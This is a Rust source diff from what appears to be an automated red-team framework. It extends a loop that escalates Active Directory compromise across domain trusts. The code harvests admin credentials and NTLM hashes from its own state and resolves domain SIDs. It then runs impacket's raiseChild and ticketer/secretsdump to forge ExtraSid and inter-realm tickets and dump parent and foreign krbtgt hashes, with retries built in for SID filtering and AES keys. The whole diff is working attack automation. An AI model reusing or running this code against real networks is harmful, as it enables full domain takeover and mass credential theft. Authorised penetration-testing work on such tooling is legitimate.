+ // `target` should be the parent DC (for secretsdump after forging ticket).
+ // Use resolve_dc_ip so the hosts table fills in when
+ // domain_controllers lacks the parent — falls back to the
+ // child DC only as a last resort (DCSync can succeed
+ // against any writable DC in the parent domain).
+ let parent_dc_ip = {
+ let s = dispatcher.state.read().await;
+ s.resolve_dc_ip(&parent_domain)
+ .unwrap_or_else(|| dc_ip.clone())
+ };
let mut payload = json!({
"technique": "create_inter_realm_ticket",
"vuln_type": "child_to_parent",
"domain": child_domain,
"trusted_domain": parent_domain,
"target_domain": parent_domain,
- "target": &dc_ip,
+ "target": &parent_dc_ip,
"dc_ip": dc_ip,
"vuln_id": &vuln_id,
});
@@ -363,50 +711,372 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch:
payload[k] = v.clone();
}
}
- // Add domain SIDs if already resolved
- {
+ // Add domain SIDs and child krbtgt (for ExtraSid via child
+ // krbtgt — preferred path, no inter-realm trust key needed).
+ //
+ // The ExtraSid attack requires the PARENT forest SID (RID 519
+ // = Enterprise Admins). If we ship the child SID by mistake,
+ // the parent KDC rejects the ticket with KDC_ERR_PREAUTH_FAILED
+ // because the embedded SID doesn't resolve to a real EA group.
+ // So if the parent SID isn't cached, resolve it via lookupsid
+ // against the parent DC using child admin creds (cross-trust
+ // SAMR works) BEFORE dispatching the exploit task. Defer the
+ // dispatch (no dedup mark) when resolution fails so the next
+ // 30s tick can retry once host scans / DC enumeration progress.
+ let parent_lower = parent_domain.to_lowercase();
+ let cd_lower = child_domain.to_lowercase();
+ let (
+ mut have_target_sid,
+ mut have_source_sid,
+ child_admin_cred,
+ child_admin_hash,
+ child_dc_ip,
+ ) = {
let s = dispatcher.state.read().await;
- if let Some(sid) = s.domain_sids.get(&child_domain.to_lowercase()) {
+ if let Some(sid) = s.domain_sids.get(&cd_lower) {
payload["source_sid"] = json!(sid);
}
- if let Some(sid) = s.domain_sids.get(&parent_domain.to_lowercase()) {
+ if let Some(sid) = s.domain_sids.get(&parent_lower) {
payload["target_sid"] = json!(sid);
}
- }
+ if let Some(child_krbtgt) = s.hashes.iter().find(|h| {
+ h.username.eq_ignore_ascii_case("krbtgt")
+ && h.domain.to_lowercase() == cd_lower
+ && h.hash_type.to_uppercase() == "NTLM"
+ }) {
+ payload["child_krbtgt_hash"] = json!(child_krbtgt.hash_value);
+ }
+ let admin_cred = s
+ .credentials
+ .iter()
+ .find(|c| {
+ c.is_admin
+ && !c.password.is_empty()
+ && c.domain.to_lowercase() == cd_lower
+ })
+ .cloned();
+ let admin_hash = s
+ .hashes
+ .iter()
+ .find(|h| {
+ h.username.to_lowercase() == "administrator"
+ && h.domain.to_lowercase() == cd_lower
+ && h.hash_type.to_uppercase() == "NTLM"
+ })
+ .cloned();
+ let child_dc = s.resolve_dc_ip(&child_domain);
+ (
+ s.domain_sids.contains_key(&parent_lower),
+ s.domain_sids.contains_key(&cd_lower),
+ admin_cred,
+ admin_hash,
+ child_dc,
+ )
+ };
- match dispatcher
- .throttled_submit("exploit", "privesc", payload, 1)
+ if !have_target_sid {
+ if let Some((sid, admin_name)) = super::golden_ticket::resolve_domain_sid(
+ &parent_domain,
+ &parent_dc_ip,
+ child_admin_cred.as_ref(),
+ child_admin_hash.as_ref(),
+ )
.await
- {
- Ok(Some(task_id)) => {
+ {
info!(
- task_id = %task_id,
+ parent_domain = %parent_domain,
+ sid = %sid,
+ "Resolved parent domain SID via lookupsid for child-to-parent ExtraSid"
+ );
+ let op_id = { dispatcher.state.read().await.operation_id.clone() };
+ let reader = ares_core::state::RedisStateReader::new(op_id);
+ let mut conn = dispatcher.queue.connection();
+ let _ = reader.set_domain_sid(&mut conn, &parent_lower, &sid).await;
+ if let Some(ref name) = admin_name {
+ let _ = reader.set_admin_name(&mut conn, &parent_lower, name).await;
+ }
+ {
+ let mut state = dispatcher.state.write().await;
+ state.domain_sids.insert(parent_lower.clone(), sid.clone());
+ if let Some(ref name) = admin_name {
+ state.admin_names.insert(parent_lower.clone(), name.clone());
+ }
+ }
+ payload["target_sid"] = json!(sid);
+ have_target_sid = true;
+ } else {
+ warn!(
child_domain = %child_domain,
parent_domain = %parent_domain,
- auth = auth_method,
- "Child-to-parent escalation dispatched"
+ parent_dc_ip = %parent_dc_ip,
+ "Could not resolve parent SID — deferring child-to-parent dispatch"
);
- let _ = dispatcher
- .state
- .mark_exploited(&dispatcher.queue, &vuln_id)
- .await;
- dispatcher
- .state
- .write()
- .await
- .mark_processed(DEDUP_TRUST_FOLLOW, key.clone());
- let _ = dispatcher
- .state
- .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key)
- .await;
- }
- Ok(None) => {
- debug!("Child-to-parent deferred by throttler");
}
- Err(e) => {
- warn!(err = %e, "Failed to dispatch child-to-parent escalation")
+ }
+ if !have_target_sid {
+ continue;
+ }
+
+ // Resolve child domain SID if not cached (needed for ExtraSid golden ticket)
+ if !have_source_sid {
+ if let Some(ref child_dc) = child_dc_ip {
+ if let Some((sid, admin_name)) =
+ super::golden_ticket::resolve_domain_sid(
+ &child_domain,
+ child_dc,
+ child_admin_cred.as_ref(),
+ child_admin_hash.as_ref(),
+ )
+ .await
+ {
+ info!(
+ child_domain = %child_domain,
+ sid = %sid,
+ "Resolved child domain SID via lookupsid for child-to-parent ExtraSid"
+ );
+ let op_id = { dispatcher.state.read().await.operation_id.clone() };
+ let reader = ares_core::state::RedisStateReader::new(op_id);
+ let mut conn = dispatcher.queue.connection();
+ let _ = reader.set_domain_sid(&mut conn, &cd_lower, &sid).await;
+ if let Some(ref name) = admin_name {
+ let _ = reader.set_admin_name(&mut conn, &cd_lower, name).await;
+ }
+ {
+ let mut state = dispatcher.state.write().await;
+ state.domain_sids.insert(cd_lower.clone(), sid.clone());
+ if let Some(ref name) = admin_name {
+ state.admin_names.insert(cd_lower.clone(), name.clone());
+ }
+ }
+ payload["source_sid"] = json!(sid);
+ have_source_sid = true;
+ } else {
+ warn!(
+ child_domain = %child_domain,
+ child_dc_ip = %child_dc,
+ "Could not resolve child SID — deferring child-to-parent dispatch"
+ );
+ }
+ } else {
+ warn!(
+ child_domain = %child_domain,
+ "No child DC IP available — deferring child-to-parent dispatch"
+ );
}
}
+ if !have_source_sid {
+ continue;
+ }
+
+ // Use raiseChild.py (impacket's canonical child→parent ExtraSid
+ // automation) via DIRECT tool dispatch (no LLM in the loop).
+ // This replaces the previous golden_ticket + secretsdump_kerberos
+ // combo, which fails because impacket's cross-realm referral is
+ // broken (fortra/impacket#315): a child-realm ticket presented
+ // to the parent KDC returns KDC_ERR_WRONG_REALM /
+ // KDC_ERR_PREAUTH_FAILED. raiseChild forges the inter-realm
+ // chain internally and dumps parent krbtgt + Administrator in
+ // one shot.
+ //
+ // Direct dispatch_tool bypasses the LLM agent loop entirely —
+ // the orchestrator owns every input (child admin hash, child
+ // DC IP, parent DC IP), so there is no value in laundering them
+ // through an LLM that might typo or omit args.
+ let admin_hash_value = child_admin_hash.as_ref().map(|h| h.hash_value.clone());
+ let admin_password = child_admin_cred
+ .as_ref()
+ .map(|c| c.password.clone())
+ .filter(|p| !p.is_empty());
+ if admin_hash_value.is_none() && admin_password.is_none() {
+ warn!(
+ child_domain = %child_domain,
+ parent_domain = %parent_domain,
+ "No child Administrator hash or password — deferring child-to-parent (raise_child needs auth)"
+ );
+ continue;
+ }
+
+ // raiseChild auto-discovers parent forest root via the
+ // child DC's trustedDomain LDAP objects and resolves DC IPs
+ // via DNS — script-level flags for IP/domain are unsupported
+ // (argparse exit 2). However, on workers without forest DNS,
+ // the bare domain FQDN (`child.contoso.local`) won't
+ // resolve — so pass the IPs so the tool wrapper can
+ // pre-seed `/etc/hosts` before invoking impacket.
+ let mut raise_args = json!({
+ "child_domain": child_domain.clone(),
+ "username": "Administrator",
+ });
+ if let Some(h) = admin_hash_value {
+ raise_args["hash"] = json!(h);
+ } else if let Some(p) = admin_password {
+ raise_args["password"] = json!(p);
+ }
+ if let Some(ref ip) = child_dc_ip {
+ raise_args["child_dc_ip"] = json!(ip);
+ }
+ raise_args["parent_domain"] = json!(parent_domain.clone());
+ if !parent_dc_ip.is_empty() {
+ raise_args["parent_dc_ip"] = json!(parent_dc_ip.clone());
+ }
+
+ let call = ToolCall {
+ id: format!("raise_child_{}", uuid::Uuid::new_v4().simple()),
+ name: "raise_child".to_string(),
+ arguments: raise_args,
+ };
+ let task_id = format!(
+ "trust_raise_child_{}",
+ &uuid::Uuid::new_v4().simple().to_string()[..12]
+ );
+
+ // Mark dedup BEFORE spawning so the next 30s tick doesn't
+ // re-dispatch the same trust while raiseChild is running.
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_TRUST_FOLLOW, key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key)
+ .await;
+
+ info!(
+ task_id = %task_id,
+ child_domain = %child_domain,
+ parent_domain = %parent_domain,
+ auth = auth_method,
+ "Dispatching raise_child (direct tool, no LLM)"
+ );
+
+ // Spawn so the trust loop continues processing other items
+ // while raiseChild runs (typically 30–120s). mark_exploited
+ // is gated on observed parent krbtgt — no premature marking.
+ let dispatcher_bg = dispatcher.clone();
+ let parent_domain_bg = parent_domain.clone();
+ let child_domain_bg = child_domain.clone();
+ let vuln_id_bg = vuln_id.clone();
+ tokio::spawn(async move {
+ let result = dispatcher_bg
+ .llm_runner
+ .tool_dispatcher()
+ .dispatch_tool("privesc", &task_id, &call)
+ .await;
+ match result {
+ Ok(exec_result) => {
+ if let Some(err) = exec_result.error.as_ref() {
+ let tail: String = exec_result
+ .output
+ .chars()
+ .rev()
+ .take(2000)
+ .collect::()
+ .chars()
+ .rev()
+ .collect();
+ warn!(
+ err = %err,
+ child_domain = %child_domain_bg,
+ parent_domain = %parent_domain_bg,
+ output_tail = %tail,
+ "raise_child returned error"
+ );
+ return;
+ }
+ // Verify parent compromise — only mark exploited
+ // when we actually observe parent krbtgt.
+ //
+ // Inspect exec_result.discoveries directly:
+ // dispatch_tool returns BEFORE push_realtime_discoveries
+ // finishes pumping hashes into state.hashes, so reading
+ // state here is too early and produces a false negative.
+ let parent_lower = parent_domain_bg.to_lowercase();
+ let has_parent_krbtgt = exec_result
+ .discoveries
+ .as_ref()
+ .and_then(|d| d.get("hashes"))
+ .and_then(|h| h.as_array())
+ .map(|hashes| {
+ hashes.iter().any(|h| {
+ let user = h
+ .get("username")
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ let dom = h
+ .get("domain")
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ let htype = h
+ .get("hash_type")
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ user.eq_ignore_ascii_case("krbtgt")
+ && dom.to_lowercase() == parent_lower
+ && htype.eq_ignore_ascii_case("ntlm")
+ })
+ })
+ .unwrap_or(false);
+ let tail_for_log: String = exec_result
+ .output
+ .chars()
+ .rev()
+ .take(2000)
+ .collect::()
+ .chars()
+ .rev()
+ .collect();
+ if has_parent_krbtgt {
+ info!(
+ parent_domain = %parent_domain_bg,
+ "raise_child compromised parent — marking exploited"
+ );
+ let _ = dispatcher_bg
+ .state
+ .mark_exploited(&dispatcher_bg.queue, &vuln_id_bg)
+ .await;
+ let techniques =
+ vec!["T1134.005".to_string(), "T1003.006".to_string()];
+ let event_id = format!(
+ "evt-raise-child-{}",
+ &uuid::Uuid::new_v4().simple().to_string()[..8]
+ );
+ let event = serde_json::json!({
+ "id": event_id,
+ "timestamp": chrono::Utc::now().to_rfc3339(),
+ "source": "trust_automation",
+ "description": format!(
+ "Child-to-parent ExtraSid escalation: {} \u{2192} {} via raiseChild",
+ child_domain_bg, parent_domain_bg
+ ),
+ "mitre_techniques": techniques,
+ });
+ let _ = dispatcher_bg
+ .state
+ .persist_timeline_event(
+ &dispatcher_bg.queue,
+ &event,
+ &techniques,
+ )
+ .await;
+ } else {
+ warn!(
+ parent_domain = %parent_domain_bg,
+ output_tail = %tail_for_log,
+ "raise_child completed but no parent krbtgt observed — NOT marking exploited"
+ );
+ }
+ }
+ Err(e) => {
+ warn!(
+ err = %e,
+ child_domain = %child_domain_bg,
+ parent_domain = %parent_domain_bg,
+ "raise_child dispatch errored"
+ );
+ }
+ }
+ });
}
}
}
@@ -557,11 +1227,10 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch:
}
// Follow trust keys (inter-realm ticket + foreign secretsdump)
- let (work, admin_cred_phase3, admin_hash_phase3): (
- Vec,
- Option,
- Option,
- ) = {
+ //
+ // The deterministic forge uses only the trust key + SIDs (already on
+ // each TrustFollowWork item); admin creds are no longer needed here.
+ let work: Vec = {
let state = dispatcher.state.read().await;
// Skip if no domain admin yet — trust extraction requires DA-level creds
@@ -578,29 +1247,6 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch:
.map(|t| (t.flat_name.to_uppercase(), t))
.collect();
- let admin_cred = state
- .credentials
- .iter()
- .find(|c| c.is_admin && !c.password.is_empty())
- .cloned();
- // Find admin hash from any dominated domain with a DC
- let admin_hash = if admin_cred.is_none() {
- state
- .domain_controllers
- .keys()
- .filter(|d| state.dominated_domains.contains(&d.to_lowercase()))
- .find_map(|dom| {
- state.hashes.iter().find(|h| {
- h.username.to_lowercase() == "administrator"
- && h.domain.to_lowercase() == dom.to_lowercase()
- && h.hash_type.to_uppercase() == "NTLM"
- })
- })
- .cloned()
- } else {
- None
- };
-
let items = state
.hashes
.iter()
@@ -609,9 +1255,7 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch:
return None;
}
- // Only process hashes that match a known trust account
let netbios = hash.username.trim_end_matches('$').to_uppercase();
- let trust = trust_by_flat.get(&netbios)?;
// Resolve source domain — fall back to first dominated domain
// with a DC when secretsdump output lacks domain prefix
@@ -628,24 +1272,44 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch:
if source_domain.is_empty() {
return None;
}
+ let source_lower = source_domain.to_lowercase();
+
+ // Resolve target FQDN: prefer explicit TrustInfo from LDAP
+ // enumeration, else derive from known domains where the
+ // NetBIOS label matches and the FQDN is not the source
+ // (filters out same-domain machine accounts).
+ let target_domain = if let Some(t) = trust_by_flat.get(&netbios) {
+ t.domain.clone()
+ } else {
+ state
+ .domain_controllers
+ .keys()
+ .chain(state.dominated_domains.iter())
+ .find(|d| {
+ let dl = d.to_lowercase();
+ dl != source_lower
+ && d.split('.')
+ .next()
+ .map(|label| label.to_uppercase() == netbios)
+ .unwrap_or(false)
+ })
+ .cloned()?
+ };
let dedup_key = format!(
"trust_follow:{}:{}",
- source_domain.to_lowercase(),
+ source_lower,
hash.username.to_lowercase()
);
if state.is_processed(DEDUP_TRUST_FOLLOW, &dedup_key) {
return None;
}
- // Use the FQDN from the trust relationship — never fall back
- // to bare NetBIOS name which produces invalid domain strings.
- let target_domain = trust.domain.clone();
-
- let target_dc_ip = state
- .domain_controllers
- .get(&target_domain.to_lowercase())
- .cloned();
+ // Use resolve_dc_ip so we fall back to the hosts table when
+ // domain_controllers lacks an explicit entry for the foreign
+ // domain — common for cross-forest trusts where the foreign
+ // DC is only known via host scan, not LDAP enumeration.
+ let target_dc_ip = state.resolve_dc_ip(&target_domain);
let source_domain_sid = state
.domain_sids
@@ -656,11 +1320,6 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch:
.get(&target_domain.to_lowercase())
.cloned();
- let source_dc_ip = state
- .domain_controllers
- .get(&source_domain.to_lowercase())
- .cloned();
-
Some(TrustFollowWork {
dedup_key,
hash: hash.clone(),
@@ -669,20 +1328,34 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch:
target_dc_ip,
source_domain_sid,
target_domain_sid,
- source_dc_ip,
})
})
.collect();
- (items, admin_cred, admin_hash)
+ items
};
for item in work {
let vuln_id = forest_trust_vuln_id(&item.source_domain, &item.target_domain);
- let trust_target = item
- .target_dc_ip
- .clone()
- .unwrap_or_else(|| item.target_domain.clone());
+
+ // Defer dispatch when the target DC IP is unknown: impacket needs
+ // a routable -target-ip for both create_inter_realm_ticket and the
+ // forge-and-present secretsdump fallback. Passing the bare domain
+ // string fails fast and burns the dedup key. Re-tick in 30s and
+ // let host scans / trust enum populate the DC entry first.
+ let target_dc_ip = match item.target_dc_ip.clone() {
+ Some(ip) => ip,
+ None => {
+ debug!(
+ source = %item.source_domain,
+ target = %item.target_domain,
+ trust_account = %item.hash.username,
+ "Deferring forest trust escalation — target DC IP unresolved"
+ );
+ continue;
+ }
+ };
+ let trust_target = target_dc_ip.clone();
{
let mut details = std::collections::HashMap::new();
details.insert(
@@ -720,77 +1393,417 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch:
.await;
}
- // 1. Dispatch inter-realm ticket creation.
- // Use field names that match the tool and prompt expectations:
- // - `vuln_type` routes to generate_trust_key_prompt
- // - `source_sid`/`target_sid` match create_inter_realm_ticket tool
- // - `trusted_domain` is read by the trust prompt
- // - Include admin creds + dc_ip so the LLM can call get_sid if SIDs are missing
- let mut ticket_payload = json!({
- "technique": "create_inter_realm_ticket",
- "vuln_type": "cross_forest",
- "domain": item.source_domain,
- "trusted_domain": item.target_domain,
- "target_domain": item.target_domain,
- "target": item.target_dc_ip.as_deref().unwrap_or(&item.target_domain),
- "trust_key": item.hash.hash_value,
- "trust_account": item.hash.username,
- "vuln_id": &vuln_id,
- });
- if let Some(ref sid) = item.source_domain_sid {
- ticket_payload["source_sid"] = json!(sid);
- }
- if let Some(ref sid) = item.target_domain_sid {
- ticket_payload["target_sid"] = json!(sid);
- }
- if let Some(ref aes) = item.hash.aes_key {
- ticket_payload["aes_key"] = json!(aes);
- }
- if let Some(ref dc_ip) = item.source_dc_ip {
- ticket_payload["dc_ip"] = json!(dc_ip);
- }
- if let Some(ref cred) = admin_cred_phase3 {
- ticket_payload["username"] = json!(cred.username);
- ticket_payload["password"] = json!(cred.password);
- } else if let Some(ref hash) = admin_hash_phase3 {
- ticket_payload["username"] = json!(hash.username);
- ticket_payload["admin_hash"] = json!(hash.hash_value);
+ // Skip self-referential trust (source == target)
+ if item.source_domain.to_lowercase() == item.target_domain.to_lowercase() {
+ debug!(
+ source = %item.source_domain,
+ target = %item.target_domain,
+ "Skipping self-referential trust escalation"
+ );
+ continue;
}
- match dispatcher
- .throttled_submit("exploit", "privesc", ticket_payload, 1)
- .await
+ // Suppress the ExtraSid forge when the trust has SID filtering
+ // active. ticketer adds Enterprise Admins (RID 519) via
+ // `--extra-sid` to satisfy DCSync — but a SID-filtered forest
+ // trust strips RID<1000 SIDs from the cross-realm PAC, and the
+ // target KDC returns rpc_s_access_denied. Burn the dedup so this
+ // doomed dispatch can't loop, mark the vuln exploited as a
+ // strategic choice, and wake the cross-forest fallback paths
+ // (ACL/MSSQL/FSP) to take over.
{
- Ok(Some(task_id)) => {
+ let state = dispatcher.state.read().await;
+ if is_filtered_inter_forest_trust(&state, &item.source_domain, &item.target_domain)
+ {
info!(
- task_id = %task_id,
+ source = %item.source_domain,
+ target = %item.target_domain,
trust_account = %item.hash.username,
- source_domain = %item.source_domain,
- target_domain = %item.target_domain,
- has_source_sid = item.source_domain_sid.is_some(),
- has_target_sid = item.target_domain_sid.is_some(),
- "Inter-realm ticket task dispatched"
+ "Suppressing forge_inter_realm_and_dump — SID filtering on cross-forest trust would reject ExtraSid; waking fallbacks"
);
+ drop(state);
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_TRUST_FOLLOW, item.dedup_key.clone());
let _ = dispatcher
.state
- .mark_exploited(&dispatcher.queue, &vuln_id)
+ .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &item.dedup_key)
.await;
- }
- Ok(None) => {
- debug!("Inter-realm ticket deferred by throttler");
+ wake_cross_forest_fallbacks(&dispatcher, &item.target_domain).await;
+
+ // Dispatch `create_inter_realm_ticket` so downstream Kerberos-capable
+ // tools (e.g. bloodyad with -k) have a valid ccache for the target
+ // forest. SID filtering blocks ExtraSid-based DCSync, but the forged
+ // TGT still allows Kerberos LDAP bind as Administrator. The tool writes
+ // Administrator.ccache in a tempdir; we persist the full path to Redis
+ // via `publish_kerberos_ticket` so the credential resolver can find it.
+ {
+ let dispatcher_bg = dispatcher.clone();
+ let source_domain_bg = item.source_domain.clone();
+ let target_domain_bg = item.target_domain.clone();
+ let trust_key_bg = item.hash.hash_value.clone();
+ let aes_key_bg = item.hash.aes_key.clone();
+ let source_domain_sid_bg = {
+ let s = dispatcher.state.read().await;
+ s.domain_sids
+ .get(&item.source_domain.to_lowercase())
+ .cloned()
+ };
+ tokio::spawn(async move {
+ dispatch_create_inter_realm_ticket(
+ &dispatcher_bg,
+ &source_domain_bg,
+ &target_domain_bg,
+ &trust_key_bg,
+ aes_key_bg.as_deref(),
+ source_domain_sid_bg.as_deref(),
+ )
+ .await;
+ });
+ }
continue;
}
- Err(e) => {
- warn!(err = %e, "Failed to dispatch inter-realm ticket");
- continue;
+ }
+
+ // Forge-and-present the inter-realm TGT as a deterministic worker
+ // task — NOT an LLM task. Both `create_inter_realm_ticket` and
+ // `secretsdump_kerberos` run sequentially on the same worker via
+ // `expand_technique_task`, so the ccache file produced by ticketer
+ // is on the same filesystem when secretsdump reads it.
+ //
+ // Routing through the LLM here would launder deterministic values
+ // (NT hash, AES key, SIDs) through token generation — the LLM
+ // would have to copy them out of the rendered prompt into tool
+ // call args, where they get dropped, typo'd, or omitted. The
+ // orchestrator already owns every input; deliver them directly.
+ //
+ // Resolve the target DC hostname so Kerberos auth can match the
+ // SPN baked into the ticket. Falls back to the IP, which works
+ // when the worker can reverse-resolve via DNS.
+ let target_dc_hostname = {
+ let s = dispatcher.state.read().await;
+ s.hosts
+ .iter()
+ .find(|h| h.ip == target_dc_ip && !h.hostname.is_empty())
+ .map(|h| h.hostname.clone())
+ .or_else(|| {
+ s.hosts
+ .iter()
+ .find(|h| {
+ (h.is_dc || h.detect_dc())
+ && h.hostname.to_lowercase().ends_with(&format!(
+ ".{}",
+ item.target_domain.to_lowercase()
+ ))
+ })
+ .map(|h| h.hostname.clone())
+ })
+ .unwrap_or_else(|| target_dc_ip.clone())
+ };
+
+ // ticketer writes .ccache in the worker cwd; the
+ // following secretsdump_kerberos call reads it via KRB5CCNAME.
+ let ticket_username = "Administrator";
+ let ticket_path = format!("{ticket_username}.ccache");
+
+ // Resolve missing source SID via lookupsid against the source
+ // DC. ticketer.py needs `--domain-sid` for the source realm to
+ // build a valid PAC; without it the resulting ticket gets
+ // rejected by the target KDC. We have DA on the source domain
+ // (cross-forest forge only fires after DA), so SAMR lookupsid
+ // works with either a password cred or admin NTLM hash.
+ let source_domain_sid = if item.source_domain_sid.is_some() {
+ item.source_domain_sid.clone()
+ } else {
+ let (source_dc_ip, src_cred, src_hash) = {
+ let s = dispatcher.state.read().await;
+ let src_lower = item.source_domain.to_lowercase();
+ let dc = s.resolve_dc_ip(&item.source_domain);
+ let cred = s
+ .credentials
+ .iter()
+ .find(|c| {
+ c.is_admin
+ && !c.password.is_empty()
+ && c.domain.to_lowercase() == src_lower
+ })
+ .cloned();
+ let h = s
+ .hashes
+ .iter()
+ .find(|h| {
+ h.username.to_lowercase() == "administrator"
+ && h.domain.to_lowercase() == src_lower
+ && h.hash_type.to_uppercase() == "NTLM"
+ })
+ .cloned();
+ (dc, cred, h)
+ };
+ let resolved = if let Some(ref dc_ip) = source_dc_ip {
+ super::golden_ticket::resolve_domain_sid(
+ &item.source_domain,
+ dc_ip,
+ src_cred.as_ref(),
+ src_hash.as_ref(),
+ )
+ .await
+ } else {
+ None
+ };
+ if let Some((sid, admin_name)) = resolved {
+ info!(
+ source_domain = %item.source_domain,
+ sid = %sid,
+ "Resolved source domain SID for cross-forest forge"
+ );
+ let op_id = { dispatcher.state.read().await.operation_id.clone() };
+ let reader = ares_core::state::RedisStateReader::new(op_id);
+ let mut conn = dispatcher.queue.connection();
+ let src_lower = item.source_domain.to_lowercase();
+ let _ = reader.set_domain_sid(&mut conn, &src_lower, &sid).await;
+ if let Some(ref name) = admin_name {
+ let _ = reader.set_admin_name(&mut conn, &src_lower, name).await;
+ }
+ {
+ let mut state = dispatcher.state.write().await;
+ state.domain_sids.insert(src_lower.clone(), sid.clone());
+ if let Some(ref name) = admin_name {
+ state.admin_names.insert(src_lower, name.clone());
+ }
+ }
+ Some(sid)
+ } else {
+ warn!(
+ source = %item.source_domain,
+ target = %item.target_domain,
+ "Could not resolve source SID — deferring cross-forest forge"
+ );
+ None
}
+ };
+ if source_domain_sid.is_none() {
+ continue;
}
- // The privesc agent handles the full flow: forge inter-realm ticket →
- // secretsdump_kerberos against the target DC. No separate credential_access
- // dispatch needed (it lacked valid auth and always failed).
+ // For child→parent forges we MUST inject the parent's Enterprise
+ // Admins SID (RID 519) as ExtraSid; without it the parent KDC
+ // issues a TGS but DRSUAPI on the parent DC rejects the
+ // replication call as `rpc_s_access_denied` and nxc dumps zero
+ // hashes (exit 0, hiding the failure).
+ //
+ // For cross-forest forges, the target domain SID is required for
+ // ticketer.py to build a PAC the target KDC will accept (without
+ // it the inter-realm TGT is rejected and forge_inter_realm_and_dump
+ // returns 0 hashes, locking dedup permanently). Resolve the target
+ // SID on-demand via lookupsid against the target DC using source
+ // admin creds (cross-trust SAMR works post-DA) when it isn't
+ // cached. Defer dispatch (no dedup mark) when resolution fails so
+ // the next 30s tick can retry once sid_enumeration populates it
+ // via lsaquery.
+ let source_l = item.source_domain.to_lowercase();
+ let target_l = item.target_domain.to_lowercase();
+ let is_child_to_parent =
+ source_l != target_l && source_l.ends_with(&format!(".{target_l}"));
+ let needs_target_sid = source_l != target_l;
+ let target_domain_sid: Option =
+ if !needs_target_sid || item.target_domain_sid.is_some() {
+ item.target_domain_sid.clone()
+ } else {
+ let (src_cred, src_hash) = {
+ let s = dispatcher.state.read().await;
+ let src_lower = item.source_domain.to_lowercase();
+ let cred = s
+ .credentials
+ .iter()
+ .find(|c| {
+ c.is_admin
+ && !c.password.is_empty()
+ && c.domain.to_lowercase() == src_lower
+ })
+ .cloned();
+ let h = s
+ .hashes
+ .iter()
+ .find(|h| {
+ h.username.to_lowercase() == "administrator"
+ && h.domain.to_lowercase() == src_lower
+ && h.hash_type.to_uppercase() == "NTLM"
+ })
+ .cloned();
+ (cred, h)
+ };
+ let resolved = super::golden_ticket::resolve_domain_sid(
+ &item.target_domain,
+ &target_dc_ip,
+ src_cred.as_ref(),
+ src_hash.as_ref(),
+ )
+ .await;
+ if let Some((sid, admin_name)) = resolved {
+ let label = if is_child_to_parent {
+ "Resolved parent domain SID for child→parent forge ExtraSid"
+ } else {
+ "Resolved target domain SID for cross-forest forge"
+ };
+ info!(
+ target_domain = %item.target_domain,
+ sid = %sid,
+ "{}", label
+ );
+ let op_id = { dispatcher.state.read().await.operation_id.clone() };
+ let reader = ares_core::state::RedisStateReader::new(op_id);
+ let mut conn = dispatcher.queue.connection();
+ let tgt_lower = item.target_domain.to_lowercase();
+ let _ = reader.set_domain_sid(&mut conn, &tgt_lower, &sid).await;
+ if let Some(ref name) = admin_name {
+ let _ = reader.set_admin_name(&mut conn, &tgt_lower, name).await;
+ }
+ {
+ let mut state = dispatcher.state.write().await;
+ state.domain_sids.insert(tgt_lower.clone(), sid.clone());
+ if let Some(ref name) = admin_name {
+ state.admin_names.insert(tgt_lower, name.clone());
+ }
+ }
+ Some(sid)
+ } else {
+ let label = if is_child_to_parent {
+ "Could not resolve parent SID — deferring child→parent forge"
+ } else {
+ "Could not resolve target SID — deferring cross-forest forge"
+ };
+ warn!(
+ source = %item.source_domain,
+ target = %item.target_domain,
+ target_dc_ip = %target_dc_ip,
+ "{}", label
+ );
+ None
+ }
+ };
+ if needs_target_sid && target_domain_sid.is_none() {
+ continue;
+ }
- // Mark as processed
+ // Wait for AES256 to upsert before dispatching cross-forest forge.
+ // secretsdump runs twice (NTLM-only first, then -aes-types) and the
+ // second call typically lands ~60-90s after NTLM. If we dispatch
+ // before AES arrives, Win2016+ targets reject the RC4-only ticket
+ // with KDC_ERR_TGT_REVOKED and forge_inter_realm yields zero hashes
+ // — locking dedup on a doomed dispatch.
+ //
+ // Re-read state.hashes for an AES-equipped variant of this trust
+ // account; if present, use it. If absent, defer up to ~3 min so the
+ // second secretsdump can land. After that, dispatch with NTLM-only
+ // as a last resort (some target DCs accept RC4 still, and the
+ // wake_cross_forest_fallbacks path is the real safety net).
+ let resolved_aes_key: Option = if needs_target_sid {
+ let from_state = {
+ let s = dispatcher.state.read().await;
+ s.hashes
+ .iter()
+ .find(|h| {
+ h.username.eq_ignore_ascii_case(&item.hash.username)
+ && h.domain.eq_ignore_ascii_case(&item.hash.domain)
+ && h.aes_key.is_some()
+ })
+ .and_then(|h| h.aes_key.clone())
+ };
+ let aes = item.hash.aes_key.clone().or(from_state);
+ if aes.is_none() {
+ let attempts = {
+ let mut state = dispatcher.state.write().await;
+ let count = state
+ .forge_aes_defers
+ .entry(item.dedup_key.clone())
+ .or_insert(0);
+ *count += 1;
+ *count
+ };
+ const MAX_AES_DEFERS: u32 = 6;
+ if attempts <= MAX_AES_DEFERS {
+ debug!(
+ source = %item.source_domain,
+ target = %item.target_domain,
+ trust_account = %item.hash.username,
+ attempts,
+ "Deferring cross-forest forge — AES256 not yet upserted on trust hash"
+ );
+ continue;
+ }
+ warn!(
+ source = %item.source_domain,
+ target = %item.target_domain,
+ trust_account = %item.hash.username,
+ "Dispatching cross-forest forge with NTLM-only after AES wait exhausted"
+ );
+ None
+ } else {
+ aes
+ }
+ } else {
+ item.hash.aes_key.clone()
+ };
+
+ // Build args for the combined `forge_inter_realm_and_dump` tool.
+ // This single tool runs impacket-ticketer + impacket-secretsdump
